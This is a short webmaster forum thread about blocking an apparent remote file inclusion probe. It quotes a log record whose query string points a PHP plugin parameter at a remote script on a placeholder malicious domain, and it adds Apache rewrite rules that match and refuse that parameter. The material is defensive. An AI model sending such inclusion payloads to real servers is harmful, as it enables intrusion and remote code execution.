They are trying to use some type of injection / XSS - I don't know enough to determine exactly what, but there are quite a few malicious-looking commands on the pages that are embedded in the script.
I blocked them by accident because of my UA filters, but if they change that and start using a standard browser UA they could probably get through. I’ve got my software vendor looking at their code to see if it is in fact vulnerable, but in the meantime...
If anyone can give me some assistance with an .htaccess RewriteCond I would be very appreciative.
The URL they are referencing is one that a user would never see and should never show up.
A redacted sample log file record looks like:
200.61.229.110 - - [05/Nov/2006:00:06:55 -0500] "GET /utility/Subdirectory/Subdirectory2/Subdirectory2_Plugin_textarea.php?mosConfig_absolute_path=http://maliciousscriptdomain.ru/c.txt? HTTP/1.0" 403 - "-"
How would I construct a RewriteCond to block all references to "/Subdirectory2_Plugin_textarea.php"?
Thanks if you can help.
P.S. If you're interested in looking at the pages that contain the scripts, send me a sticky note.
Everybody gets these probes all the time.
If you have a long 403 page, though, it could result in significant traffic, so you might want to use mod_rewrite to just send a blank 403 or no response.
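One way to write the rule asked for above, together with the short 403 body suggested in the reply. This is an added example, not code posted by anyone in the thread; it also refuses the `mosConfig_absolute_path=http://...` parameter on any script, which goes slightly beyond the single file in the question. It assumes Apache 2.x with mod_rewrite enabled, `AllowOverride FileInfo`, and an .htaccess file in the site's document root.

```apache
# Added example (not from the thread). Place in the document-root .htaccess.
RewriteEngine On

# 1) The script named in the log record. REQUEST_URI excludes the query
#    string, so the "$" anchor matches the end of the path itself.
RewriteCond %{REQUEST_URI} /Subdirectory2_Plugin_textarea\.php$ [NC,OR]

# 2) Any request whose query string sets mosConfig_absolute_path to a remote
#    URL. QUERY_STRING is not URL-decoded, so the encoded colon (%3A) is
#    matched as well as the literal one.
RewriteCond %{QUERY_STRING} (^|&)mosConfig_absolute_path=https?(:|%3A) [NC]

# Answer 403 Forbidden and stop processing; "-" means no substitution.
RewriteRule ^ - [F]

# Keep the 403 response body to one word so repeated probes cost almost no
# bandwidth. This applies to every 403 served under this directory.
ErrorDocument 403 "Forbidden"
```

Because the two conditions are joined with `[OR]`, the block does not depend on the User-Agent, so it keeps working if the probes switch to a standard browser UA.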